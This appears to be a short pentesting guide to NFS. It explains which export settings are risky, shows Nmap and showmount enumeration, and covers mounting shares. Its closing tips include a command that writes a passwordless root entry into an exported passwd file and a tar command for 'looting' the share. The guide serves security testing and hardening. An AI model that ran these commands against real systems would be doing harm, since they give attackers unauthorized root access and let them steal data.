NFS
NFS Security & Exploitation Guide
1. About NFS
Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems. Its purpose is to allow systems to:
Access remote file systems over a network as if they were local.
Provide file sharing primarily between Linux and Unix systems (not directly compatible with SMB).
Configuration File:
/etc/exports
defines which directories are shared and the permissions granted to clients.
Default Ports:
RPC portmapper: 111/TCP & UDP
NFS service: 2049/TCP & UDP
2. Dangerous NFS Export Settings
Some NFS configurations can be insecure and lead to privilege escalation or unauthorized access:
rw
→ Grants read & write permissions.insecure
→ Allows connections from ports >1024 (less trusted).nohide
→ Exports nested filesystems automatically.no_root_squash
→ Critical risk: root users on clients retain root privileges on the NFS share (can create files owned by UID/GID 0).
Best Practice: Always avoid
no_root_squash
in production environments.
3. Enumeration & Exploitation
Nmap Enumeration
Use Nmap NSE scripts to fingerprint NFS:
sudo nmap -sV -p111,2049 --script nfs* 192.0.2.15
Show Available NFS Shares
showmount -e 192.0.2.15
Example output:
Export list for 192.0.2.15:
/srv/nfs_share *
4. Mounting & Unmounting NFS Shares
Mount a Share
mkdir target-NFS
sudo mount -t nfs 192.0.2.15:/srv/nfs_share ./target-NFS/ -o nolock
Unmount a Share
sudo umount ./target-NFS
5. Tips & Tricks for Pentesters
Privilege Escalation via no_root_squash If enabled, create a file owned by
root
on your local system, then copy it to the mounted share:echo "hacked::0:0::/root:/bin/bash" > ./target-NFS/passwd
This could allow creation of root accounts if
/etc/passwd
is exported.Recursive Share Search Check for nested exports using
findmnt
or mounting multiple shares.Quick Looting with tar Instead of downloading files individually:
cd ./target-NFS tar -cvf loot.tar *
Last updated